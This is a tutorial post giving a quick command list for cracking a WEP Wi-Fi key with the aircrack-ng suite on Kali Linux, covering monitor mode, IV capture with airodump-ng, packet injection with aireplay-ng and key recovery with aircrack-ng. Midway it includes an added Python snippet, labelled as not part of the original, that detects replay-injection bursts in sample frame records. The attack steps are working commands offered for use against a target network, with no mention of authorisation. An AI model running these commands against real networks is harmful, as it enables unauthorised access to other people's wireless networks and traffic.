Wireless Attack: WEP

The following is a quick-hit list of commands for attacking a WEP wireless network. It assumes you are using a 2016 variant of Kali Linux with the aircrack-ng suite installed and a wireless network card that can be placed into monitor mode (which should be about 100% of them). It also assumes that there is a WEP network with an associated client that is transmitting, and that you are running as a user with sufficient permissions to execute each of these commands.

For the sake of this tutorial the AP will be assumed to have a MAC address of “DE:AD:DE:AD:DE:AD” and the client will be assumed to have a MAC address of “BE:AD:ED:BE:AD:ED”. The wireless network card we will use will be assumed to be “wlan0”.

UPDATE 2017-01-01: If a presentation is more your style of learning you can access training on this topic here: Wireless Attacks – WEP (basic_0x00)

First up, boot up Kali and shut down any potentially interfering programs:

airmon-ng check kill

Then put the interface into monitor mode:

airmon-ng start wlan0

Next up, find the target WEP network:

airodump-ng wlan0mon

Make sure to note the client (BE:AD:ED:BE:AD:ED for our example), the AP (DE:AD:DE:AD:DE:AD for our example), and the channel (10 for our example), then exit airodump-ng with CTRL+C. Now restart airodump-ng to capture the IVs for the network:

airodump-ng --channel 10 --bssid DE:AD:DE:AD:DE:AD -w wep-capture --ivs wlan0mon

Leave that running, then jump over to a new window/terminal and start injecting to stimulate IV creation. We’ll use the modified packet approach, since a suitable candidate packet is easier to find that way:

aireplay-ng -2 -b DE:AD:DE:AD:DE:AD -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 wlan0mon

To break that down a bit:

  • -2 means modified packet attack
  • -b means the AP address
  • -t 1 means to look for a candidate packet that has the “To Distribution System” flag set
  • -c means the destination address (broadcast in this case)
  • -p 0841 means to set the frame control field to 0x0841 (a data frame with the “To Distribution System” flag set)
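Seen from the defending side, the injection above has a distinctive fingerprint: one captured data frame (ToDS and Protected bits set, broadcast destination) is replayed with the same WEP IV far faster than any real client, which increments its IV per frame, would ever send it. The following is an added example, not part of the original post, that decodes the 0841 frame-control word and flags such bursts in a list of constructed frame records (time, src, dst, frame control, IV); the record layout and the window/threshold values are assumptions.

```python
# Added example: detect WEP replay injection in constructed frame records.
# Record layout (time_s, src_mac, dst_mac, frame_control, iv) is an assumption.
from collections import Counter, defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"
FC_TO_DS = 0x01       # flags byte, bit 0: To Distribution System
FC_PROTECTED = 0x40   # flags byte, bit 6: Protected Frame (WEP/WPA)


def decode_frame_control(fc: int) -> dict:
    """Decode a frame-control word written the way aireplay-ng's -p takes it
    (0x0841 = first byte 0x08, second byte 0x41)."""
    first, flags = fc >> 8, fc & 0xFF
    return {
        "type": (first >> 2) & 0x3,   # 0 management, 1 control, 2 data
        "subtype": first >> 4,
        "to_ds": bool(flags & FC_TO_DS),
        "protected": bool(flags & FC_PROTECTED),
    }


def find_replay_bursts(frames, window=1.0, threshold=20):
    """Return (src, iv, count) for each source that repeats one IV at least
    `threshold` times to broadcast inside any `window`-second span."""
    by_src = defaultdict(list)
    for t, src, dst, fc, iv in frames:
        d = decode_frame_control(fc)
        if d["type"] == 2 and d["to_ds"] and d["protected"] and dst == BROADCAST:
            by_src[src].append((t, iv))
    alerts = []
    for src, events in by_src.items():
        events.sort()
        worst, start = (None, 0), 0         # busiest (iv, count) window seen
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1                   # slide the window forward
            iv, n = Counter(v for _, v in events[start:end + 1]).most_common(1)[0]
            if n > worst[1]:
                worst = (iv, n)
        if worst[1] >= threshold:
            alerts.append((src, worst[0], worst[1]))
    return alerts


# Constructed sample: a client sends five frames with increasing IVs, then a
# single frame with IV 0x100003 is replayed 40 times in 0.2 s (injection).
CLIENT = "be:ad:ed:be:ad:ed"
SAMPLE = [(0.1 * i, CLIENT, BROADCAST, 0x0841, 0x100000 + i) for i in range(5)]
SAMPLE += [(2.0 + 0.005 * i, CLIENT, BROADCAST, 0x0841, 0x100003) for i in range(40)]

if __name__ == "__main__":
    print(find_replay_bursts(SAMPLE))
```

On a live capture the same rule runs over frames pulled from a monitor-mode interface, keyed on the WEP IV bytes that follow the 802.11 header.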

Now in a third window/terminal start the crack:

aircrack-ng wep-capture

Select the target network, and let it sit. It will automatically poll the capture file and keep trying as thresholds are reached until the key is recovered. Remember that you need to try both “Open” and “Shared” key types as well as each key number to properly join the target network. Good hunting!
